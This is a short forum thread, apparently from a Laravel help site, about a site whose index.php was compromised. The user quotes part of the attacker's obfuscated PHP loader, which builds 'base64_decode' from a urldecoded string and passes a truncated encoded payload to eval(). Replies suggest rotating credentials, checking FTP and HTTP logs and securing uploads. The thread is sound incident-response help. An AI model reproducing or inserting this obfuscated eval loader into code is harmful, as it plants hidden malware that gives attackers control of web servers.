Level 39
Make sure your .env is not/has not neen public (rights, github, ...)
Make it private & change your credential.
Apr 24, 2021
9
Level 1
Help! index.php compromised.
The public folder got some new php file. and the index.php being prepend some PHP encoded code.
Here is part of the code:
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAw....."
I did some investigate, before the "eval", this code run a method calls "n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j"
I don't really want to know what they are trying to do, but I do want to know how could they modify the index.php file.
Here is my envirionment: PHP 7.4 Laravel: 8.12
Thank you.
Level 1
Thank for your answer, the .env is secured, only the public folder exposed.
Level 39
only the public folder exposed.
What do you mean?
Level 1
In the point of view for the visitor, they could only see "/index.php"
Level 39
So if you think everything is correct now, change your credential.
Level 17
If you have control over the server logs, check the FTP logins.
A new file in the public directory usually means that FTP credentials have been compromised. Laravel itself doesn't usually allow uploads to the public directory, but only to the storage.
Level 54
check the http and ftp access log, review all the suspicious access and see what and where. reset your control panel or any backend access credential..
Level 1
Client said that he doesn't have a backend for the hosting, no FTP either. He built his hosting from scratch.
Level 122
check all uploads are secure
Please or to participate in this conversation.